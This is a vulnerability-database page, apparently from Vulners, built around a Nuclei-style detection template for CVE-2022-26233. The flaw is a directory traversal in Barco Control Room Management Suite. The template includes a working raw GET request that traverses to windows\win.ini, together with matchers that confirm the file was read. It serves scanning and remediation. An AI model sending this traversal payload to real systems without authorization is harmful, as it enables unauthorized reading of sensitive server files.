| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| Barco Control Room Management Suite Directory Traversal Vulnerability | 6 Apr 202200:00 | – | zdt | |
| CVE-2022-26233 | 3 Apr 202223:15 | – | attackerkb | |
| Microsoft Patch Tuesday August 2022: DogWalk, Exchange EOPs, 13 potentially dangerous, 2 funny, 3 mysterious vulnerabilities | 23 Aug 202200:00 | – | avleonov | |
| CVE-2022-26233 | 4 Apr 202202:27 | – | circl | |
| Barco Control Room 路径遍历漏洞 | 3 Apr 202200:00 | – | cnnvd | |
| CVE-2022-26233 | 3 Apr 202222:05 | – | cve | |
| CVE-2022-26233 | 3 Apr 202222:05 | – | cvelist | |
| CVE-2022-26233 | 3 Apr 202223:15 | – | nvd | |
| Generic HTTP Directory Traversal / File Inclusion (Web Root) - Active Check | 18 Apr 201700:00 | – | openvas | |
| CVE-2022-26233 | 3 Apr 202223:15 | – | osv |
id: CVE-2022-26233
info:
name: Barco Control Room Management Suite <=2.9 Build 0275 - Local File Inclusion
author: 0x_Akoko
severity: high
description: Barco Control Room Management through Suite 2.9 Build 0275 is vulnerable to local file inclusion that could allow attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring.
impact: |
An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
remediation: |
Upgrade Barco Control Room Management Suite to a version higher than 2.9 Build 0275 to mitigate the vulnerability.
reference:
- https://0day.today/exploit/37579
- http://seclists.org/fulldisclosure/2022/Apr/0
- http://packetstormsecurity.com/files/166577/Barco-Control-Room-Management-Suite-Directory-Traversal.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-26233
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-26233
cwe-id: CWE-22
epss-score: 0.15028
epss-percentile: 0.96313
cpe: cpe:2.3:a:barco:control_room_management_suite:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: barco
product: control_room_management_suite
tags: cve,cve2022,barco,lfi,seclists,packetstorm,vuln
http:
- raw:
- |+
GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
Host: {{Hostname}}
unsafe: true
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
# digest: 4b0a004830460221008c96e8ba7e395a807aaff4ae17ad0fa18b556b822b7ee5d62a402839ba05c585022100c220888dc3fc9a7c6f59fd559681f9c6296d25eab6e51251373f2458d7572cc4:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation